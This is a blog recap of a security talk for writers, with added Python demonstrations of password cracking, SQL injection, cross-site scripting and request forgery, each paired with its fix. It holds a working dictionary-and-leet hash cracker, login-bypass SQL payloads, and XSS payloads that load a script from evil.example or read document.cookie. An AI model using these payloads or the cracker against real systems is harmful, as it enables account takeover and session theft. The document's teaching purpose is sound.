JT Evans, as well as being a writer, is
a computer security expert who started programming at the age of seven and has
been a Certified Ethical Hacker since 2009. During his June Write Brain talk,
he covered three main topics: how writers should take care of their computers,
computer security basics for writers, and what the bad guys are doing with
computers.
What the Bad Guys Are Doing with Computers
The bad guys are violating one of three
principles of computer security when they go after someone’s computer:
Confidentiality. For example, reading or leaking your personal information without authorization.
Integrity. For example, changing test scores or introducing a virus onto your system.
Availability. For example, taking down a website or server so the people who are supposed to use it can’t.
These three principles are known as the CIA triad of
computer security.
What methods can the bad guys use?
Denial of Service (DoS) or Distributed Denial of
Service (DDoS) attack. This kind of
attack blocks legitimate users from reaching a computer, website, or network. The classic single-machine DoS took
advantage of a particular vulnerability in the Windows 95/ME/XP operating
systems that let a bad guy crash your computer (a division by zero error was
involved). Crash bugs of that kind are mostly closed now. DDoS attacks instead
use botnets (large numbers of compromised computers under one person’s control) to send so many requests to a webpage or server that
the server cannot answer all of them, effectively taking
down the webpage or server for a time.
Weak password vulnerabilities. A computer program can guess a lot of passwords
using dictionary files, very quickly. Because a lot of people have easily
guessed passwords (from things like “password” to their spouse’s name), a lot
of people are vulnerable to this kind of attack. Here are some password tips:
Use at least eight characters; longer is better, since every extra character multiplies the number of guesses an attacker has to make.
Use a mix of lowercase, uppercase, numbers, and symbols whenever possible.
Don’t depend on replacing letters with numbers or symbols (as in p@ssw0rd), because cracking programs now apply those replacements to every word in their dictionaries, too.
Don’t use an easily guessed word or code as a password (password, 123456, qwerty, letmein, etc.).
Use a phrase that you can easily remember to build a password, using the initial letters of each word in the phrase (e.g., TQBFJOTLD for “The quick brown fox jumps over the lazy dog”). Pick a phrase that is private to you rather than a famous quotation like that one, because the initials of well-known phrases can be put into a dictionary file as easily as words can.
Don’t use the same password everywhere; if a computer or website is hacked, every password stored on it may be exposed (as in the recent LinkedIn hacking). You don’t want your password at your bank to be hacked just because someone hacked into a social networking site, do you?
A good way to store passwords is to have one really good password that you don’t use anywhere else, and use it only to lock a GPG-encrypted text file that stores all your other passwords (along with their user names and websites).
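To show why the p@ssw0rd and famous-phrase advice matters, here is a small added example (not part of JT’s talk or his handouts) of the guessing attack a cracking program runs against a stolen list of password hashes. Everything in it is constructed: the wordlist, the phrase list and the “leaked” hashes are stand-ins, and it assumes the hacked site stored plain, unsalted SHA-1 hashes, as the LinkedIn leak did.

```python
"""Added example: an offline guessing attack against stolen password hashes.

All data here is constructed; this is not code from the talk. A site that stored
unsalted SHA-1 (as the 2012 LinkedIn leak did) lets an attacker hash millions of
guesses per second and compare each one against the whole stolen list at once.
"""
import hashlib
import itertools

# Stand-in for a real wordlist, which would hold millions of entries.
WORDLIST = ["password", "123456", "qwerty", "letmein", "monkey", "dragon"]

# Phrases famous enough that a cracking wordlist would carry their initials too.
FAMOUS_PHRASES = [
    "the quick brown fox jumps over the lazy dog",
    "to be or not to be that is the question",
]

# Letter swaps that cracking tools apply as "rules" to every dictionary word.
LEET = {"a": "a@4", "e": "e3", "i": "i1!", "o": "o0", "s": "s$5", "t": "t7"}
SUFFIXES = ("", "1", "123", "!")


def leet_variants(word):
    """Yield every spelling of `word` under the LEET swaps, the original included."""
    choices = [LEET.get(ch, ch) for ch in word]
    for combo in itertools.product(*choices):
        yield "".join(combo)


def acronym(phrase):
    """Initial letters of each word, upper-cased: the password-building trick in the text."""
    return "".join(w[0] for w in phrase.split()).upper()


def candidates():
    """Generate guesses in the order a cracking tool would: the cheap ones first."""
    for word in WORDLIST:
        for cased in (word, word.capitalize(), word.upper()):
            for variant in leet_variants(cased):
                for suffix in SUFFIXES:
                    yield variant + suffix
    for phrase in FAMOUS_PHRASES:
        for suffix in SUFFIXES:
            yield acronym(phrase) + suffix


def sha1_hex(password):
    """Unsalted SHA-1, the weak storage scheme this attack assumes."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack(stolen_hashes):
    """Return {plaintext: hash} for every stolen hash that some guess matches."""
    targets = set(stolen_hashes)
    found = {}
    for guess in candidates():
        digest = sha1_hex(guess)
        if digest in targets:
            found[guess] = digest
            if len(found) == len(targets):
                break
    return found


def demo():
    """A constructed 'leak' of four hashes: which of the text's password styles survive?"""
    leaked = {
        "p@ssw0rd": sha1_hex("p@ssw0rd"),        # letter swaps only
        "Letmein123": sha1_hex("Letmein123"),    # dictionary word plus a suffix
        "TQBFJOTLD": sha1_hex("TQBFJOTLD"),      # initials of a famous pangram
        "Mcwt2tfd!": sha1_hex("Mcwt2tfd!"),      # initials of a private sentence
    }
    cracked = crack(leaked.values())
    return {pw: pw in cracked for pw in leaked}


if __name__ == "__main__":
    for pw, broken in demo().items():
        print(f"{pw:12s} {'CRACKED' if broken else 'survived'}")
```

Three of the four fall, including the pangram acronym, because the attacker never has to guess character by character: the rules and phrase lists do the work. Only the initials of a sentence nobody else knows survive, and that is the whole point of the advice above.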
Buffer overflows. When you’re inputting data into a field, if the program has set aside, say, 10
characters of memory for a phone number, and nothing stops someone from
typing in more, then the extra characters (after the first ten
in our example) spill into neighboring memory and can be used to reprogram the software. In the past,
this was the most common way to attack a system; now, with more protections
built into operating systems and compilers, it’s moving to #2 after...
SQL injection. Structured Query Language (SQL) is the language used to ask questions of
relational databases. It’s like a buffer overflow in that you type extra
characters into a field to force the database to do something it wasn’t supposed to do (skip a password check, read other people’s records, change or delete data). It works because the program pastes what you typed straight into a database command, so
the techniques are specific to SQL databases.
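Here is an added example (not from the talk) of what that pasting looks like, using Python’s built-in sqlite3 with a made-up users table. The first login check builds its SQL by gluing the typed text into the command; the second hands the text to the database separately, as data, so nothing a user types can change the command. The table stores passwords in plain text only to keep the example short; a real system would store salted hashes.

```python
"""Added example: SQL injection against a login check, and the parameterized fix.

Not code from the talk. Uses the sqlite3 module that ships with Python and a
constructed users table.
"""
import sqlite3


def make_db():
    """Constructed in-memory database with two users (plaintext passwords for brevity only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    return db


def login_vulnerable(db, username, password):
    """Builds the command by pasting user input into the SQL text."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same check with '?' placeholders: the driver sends the input as data, never as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two classic payloads. The first comments out the password test ('--' starts a
# SQL comment); the second makes the WHERE clause true for every row.
COMMENT_OUT = "alice'--"
ALWAYS_TRUE = "x' OR '1'='1"


def demo():
    """Return who each login function lets in for a genuine login and the two attacks."""
    db = make_db()
    return {
        "genuine, vulnerable": login_vulnerable(db, "alice", "correct horse"),
        "genuine, safe": login_safe(db, "alice", "correct horse"),
        "comment-out, vulnerable": login_vulnerable(db, COMMENT_OUT, "wrong"),
        "comment-out, safe": login_safe(db, COMMENT_OUT, "wrong"),
        "always-true, vulnerable": login_vulnerable(db, ALWAYS_TRUE, ALWAYS_TRUE),
        "always-true, safe": login_safe(db, ALWAYS_TRUE, ALWAYS_TRUE),
    }


if __name__ == "__main__":
    for case, user in demo().items():
        print(f"{case:26s} -> {user}")
```

With the pasted version, typing alice'-- as the user name logs the attacker in as alice with any password at all; the placeholder version just looks for a user literally named alice'-- and finds none. Parameterized queries (also called prepared statements) are the standard fix, and every mainstream database library offers them.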
Social engineering. This is using clever tricks to get people to hand over information or access themselves, with no technical break-in needed. If
someone ever asks you for personal
information, and you didn’t initiate the request by asking for something first,
it’s probably social engineering (for example, phishing emails or even fake
antivirus software).
Cross Site Scripting (XSS). The bad guy injects his own script into a website other people trust (through a comment, a profile field, or a crafted link), so that when your browser loads the page it runs his script as if it were part of the site. The script can then do naughty things in your browser, such as steal your login session or show you fake content. This can
be used to create a browser-based botnet.
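The following added example (not from the talk) shows the injection with a made-up guestbook page and two constructed attacker comments. It renders the page three ways: pasting comments in as-is, a tempting half-fix that only strips script tags, and proper escaping, which is what actually closes the hole. The evil.example hostname is a placeholder.

```python
"""Added example: a stored cross-site scripting bug, a half-fix, and the real fix.

Not code from the talk. The guestbook, the comments and the hostname are constructed.
"""
import html
import re

# Two constructed attacker comments. The first is the obvious one; the second
# runs JavaScript with no <script> tag at all, via an event-handler attribute.
ATTACKER_COMMENTS = [
    '<script src="https://evil.example/hook.js"></script>',
    '<img src="x" onerror="alert(document.cookie)">',
]

TEMPLATE = "<h1>Guestbook</h1>\n<ul>\n{items}\n</ul>"


def render_vulnerable(comments):
    """Pastes each comment straight into the HTML: markup in a comment becomes markup in the page."""
    items = "\n".join(f"<li>{c}</li>" for c in comments)
    return TEMPLATE.format(items=items)


def render_blacklist(comments):
    """Tempting half-fix: delete <script> tags. Any other tag that can run JavaScript slips through."""
    cleaned = [re.sub(r"</?script[^>]*>", "", c, flags=re.IGNORECASE) for c in comments]
    return render_vulnerable(cleaned)


def render_safe(comments):
    """Escapes <, >, &, and quotes, so the browser displays the comment as text."""
    items = "\n".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return TEMPLATE.format(items=items)


def runs_javascript(page):
    """Crude check for the two ways the constructed payloads execute: a real <script>
    tag, or a real tag carrying an on* event-handler attribute."""
    return re.search(r"<(script\b|\w+[^>]*\son\w+\s*=)", page, re.IGNORECASE) is not None


def demo():
    """Which rendering strategies leave the attacker's code live?"""
    return {
        "paste as-is": runs_javascript(render_vulnerable(ATTACKER_COMMENTS)),
        "strip script tags": runs_javascript(render_blacklist(ATTACKER_COMMENTS)),
        "escape output": runs_javascript(render_safe(ATTACKER_COMMENTS)),
    }


if __name__ == "__main__":
    for strategy, live in demo().items():
        print(f"{strategy:18s} attacker code runs: {live}")
    print(render_safe(ATTACKER_COMMENTS))
```

The lesson for anyone who runs a blog or forum: escape everything a visitor typed at the point where it is written into the page, rather than trying to list the dangerous things and remove them, because the list is never complete.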
Cross Site Request Forgery (CSRF). This uses HTML on a page the bad guy controls to make your browser send a request to a site where you’re already logged in. Because your browser attaches your login cookie to every request it sends to that site, the site can’t tell the forged request from one you meant to make. For example, while you’re logged in to Amazon, a page you happen to visit elsewhere could make your browser submit the “Buy now with 1-Click” request without your ever choosing to click that button. (A related trick, clickjacking, hides the real button under something else so that a click anywhere on the page lands on it.)
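To make the mechanism concrete, here is an added example (not from the talk) that models the exchange with plain Python dictionaries instead of a real web server: a shop that trusts the login cookie alone, and the same shop protected by a secret token that only its own checkout form carries. The shop, the sessions and the “gold bars” order are all constructed; no real Amazon endpoint is involved.

```python
"""Added example: how a cross-site request forgery works, and the per-session token fix.

Not code from the talk. Models browser and server with dicts; all data constructed.
"""
import hmac
import secrets

# Server-side session store: cookie value -> session record.
SESSIONS = {}


def login(user):
    """Server issues a session cookie and a CSRF token tied to that session."""
    cookie = secrets.token_hex(16)
    SESSIONS[cookie] = {"user": user, "csrf": secrets.token_hex(16), "orders": []}
    return cookie


def checkout_form(cookie):
    """The shop's own checkout form carries the hidden token. A page on another
    site cannot read this form, so it cannot learn the token."""
    return {"item": "", "csrf_token": SESSIONS[cookie]["csrf"]}


def forged_form():
    """What an attacker's page makes the victim's browser submit to the shop.
    The browser attaches the victim's cookie on its own; the token is absent."""
    return {"item": "gold bars"}


def handle_buy_vulnerable(cookie, form):
    """Trusts the cookie alone, so a request triggered by any page goes through."""
    session = SESSIONS.get(cookie)
    if session is None:
        return False
    session["orders"].append(form["item"])
    return True


def handle_buy_safe(cookie, form):
    """Requires the session's token as well; compare_digest avoids timing leaks."""
    session = SESSIONS.get(cookie)
    if session is None:
        return False
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return False
    session["orders"].append(form["item"])
    return True


def demo():
    """A logged-in shopper visits the attacker's page, then checks out for real."""
    cookie = login("writer")
    results = {
        "forged, cookie only": handle_buy_vulnerable(cookie, forged_form()),
        "forged, cookie + token": handle_buy_safe(cookie, forged_form()),
    }
    genuine = checkout_form(cookie)
    genuine["item"] = "pens"
    results["genuine, cookie + token"] = handle_buy_safe(cookie, genuine)
    results["orders placed"] = tuple(SESSIONS[cookie]["orders"])
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:24s} -> {outcome}")
```

The forged order succeeds against the cookie-only shop and fails against the token-checking one, while the shopper’s own order still goes through. Modern web frameworks generate and check such tokens for you; the practical advice for a reader is simply to log out of shopping and banking sites when you’re done, so there is no live session for a forged request to ride on.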
Lack of encryption. On an unsecured wireless network, anyone else in range can read everything you send that isn’t encrypted, including passwords and email. Use a Virtual Private
Network (VPN) if you have one whenever you’re on unsecured wifi, and use Secure
Sockets Layer (SSL) (that is, a site whose address starts with https:// rather than http://)
when possible. Also, when you’re choosing the encryption for your own wireless
network, use WPA2 rather than WEP, which is easily broken.
Network/Host scanning. There are a wealth of tools available that will scan
networks and computers for open services and known vulnerabilities. These are used by both the bad guys and the good guys: the
bad guys to try to break into systems; the good guys to make sure it won’t be
easy to break in. Some examples are nmap (finds computers and the services they expose), Nessus/OpenVAS (vulnerability scanners), Metasploit (tests whether a vulnerability can actually be exploited), and
Kismet (finds wireless networks).
If you need more information, you can
go to JT’s website, jtevans.net.
If you’d like a copy of his handouts,
click here.
About the Writer:
DeAnna Knippling is a freelance writer, editor, and formatter married to
a Network Administrator, and she was still embarrassed about some of her
personal security practices after hearing JT's talk. Check out her
personal blog at www.DeAnnaKnippling.com
or her small press at www.WonderlandPress.com.